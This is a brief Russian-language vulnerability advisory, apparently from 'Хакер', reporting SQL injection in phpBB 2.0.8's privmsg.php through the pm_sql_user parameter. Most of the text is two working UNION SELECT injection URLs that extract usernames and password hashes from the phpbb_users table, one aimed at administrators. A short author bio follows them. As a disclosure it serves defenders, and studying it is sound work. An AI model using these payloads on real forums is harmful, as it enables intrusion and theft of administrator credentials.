Sql инъекция в phpBB форуме

Программа: phpBB 2.0.8

Уязвимость в проверке правильности входных данных обнаружена в phpBB в 'privmsg.php' сценарии. Удаленный пользователь может внедрить произвольный SQL код.

Пример:

http://localhost/phpbb206c/privmsg.php?folder=savebox& mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=
-99%20UNION%20SELECT% 20username,null,user_password,null,nul
l,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,nu
ll,null,null,null,null,null,null,null,null,null FROM phpbb_users WHERE
user_level=1 LIMIT 1/*

/privmsg.php?folder=savebox&mode=read &p=99&pm_sql_user=AND
pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_pa ssword FROM phpbb_users WHERE user_id=2 LIMIT
1/*

Анатолий Ализар: Бывший автор новостной ленты «Хакера». Увлекается современными технологиями, оружием, информационной безопасностью, носимой электроникой и в целом концепцией Internet of Things.